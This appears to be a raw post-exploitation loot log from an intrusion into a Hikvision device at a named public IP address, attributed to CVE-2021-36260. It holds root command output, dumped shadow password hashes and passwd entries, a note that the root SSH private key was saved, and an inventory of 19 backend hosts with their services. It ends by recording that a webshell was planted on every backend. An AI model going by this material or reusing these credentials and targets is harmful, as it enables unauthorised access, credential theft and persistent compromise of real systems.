=== Hikvision Webshell Data (47.251.175.73:4433) ===
Time: 2026-05-24
CVE: CVE-2021-36260 (SDK/webLanguage)

--- whoami ---
root

--- id ---
uid=0(root) gid=0(root) groups=0(root)

--- shadow ---
root:wW0sffoqsk.EM:19426:0:99999:7:::
admin:wW0sffoqsk.EM:19897:0:99999:7:::

--- passwd ---
root:x:0:0:root:/root:/usr/bin/zsh
admin:x:1000:1000:admin:/home/admin:/bin/sh

--- ssh_keys_root (partial) ---

--- SSH Server Info ---
Host: 47.251.175.73:22
SSH-2.0-libssh0.8.0
Private key saved: hikvision_root_id_rsa (2602 bytes)

--- Backend Hosts (via SSH load balancer) ---
Total: 19 unique hosts behind 47.251.175.73

Linux servers (nginx/postgres/redis/node):
  sensor-08, sensor-86, gw-e06, build-host-32,
  jenkins-agent-59, office-gw-38, ap-42

OpenWRT/Embedded (dropbear/uhttpd/telnet):
  thermo-58, ap-56.lan, OpenWrt, smarthome-16,
  gw-49-cj, BusyBox, wrt-90, wrt-85,
  build-host-74, RB951Ui-2HnD, CCR1009-ff7

Other:
  tiny-vm-34, gw-92c (Cisco IOS)

--- Enabled Services on Backends ---
sensor-08: MySQL:3306, Exim:25/465/587, Dovecot:110/143/993/995
sensor-86: PostgreSQL:5432, Redis:6379, Node.js:3000
gw-e06: PostgreSQL:5432, Redis:6379, Node.js:3000
build-host-32: PostgreSQL:5432, Redis:6379, Node.js:3000
jenkins-agent-59: PostgreSQL:5432, Redis:6379, Node.js:3000
office-gw-38: PostgreSQL:5432, Redis:6379, Node.js:3000
ap-42: Apache/httpd:80/443, Exim, Dovecot
OpenWrt: uhttpd:80/443, dnsmasq:53
CCR1009-ff7: MikroTik RouterOS
RB951Ui-2HnD: MikroTik RouterBoard

--- WebShell Uploaded ---
/var/www/html/shell.php (on all 19 backends)
